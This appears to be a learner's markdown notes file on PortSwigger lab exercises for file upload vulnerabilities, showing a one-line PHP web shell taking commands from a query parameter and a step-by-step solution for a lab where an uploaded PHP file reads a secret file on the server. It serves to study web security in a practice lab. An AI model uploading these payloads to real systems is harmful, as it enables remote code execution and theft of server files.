nav-yaa/Portswigger-Labs-/File upload vulnerabilities.md

 <?php echo system($_GET['command']); ?>
 This script enables you to pass an arbitrary system command via a query parameter as follows:
 GET /example/exploit.php?command=id HTTP/1.1

+# lab 001
+Remote code execution via web shell upload
+ques: This lab contains a vulnerable image upload function.
+It doesn't perform any validation on the files users upload before storing them on the server's filesystem.
+How to proceed
+1. upload a basic PHP web shell
+2. use it to exfiltrate the contents of the file /home/carlos/secret How did I do it
+1. Under HTTP history filter window, Under Filter by MIME type, we enabled the Images checkbox.
+Upload any random image.
+2. Image was fetched using a GET request to /files/avatars/<YOUR-IMAGE>
+3. Created exploit.php, containing a script for fetching the contents of Carlos's secret file.
+<?php echo file_get_contents('/home/carlos/secret'); ?> and then uplod it.
+4. Change the path of the request to point to your PHP file:
+GET /files/avatars/exploit.php HTTP/1.1

+#  Exploiting Flawed validation of file upload

+# lab 002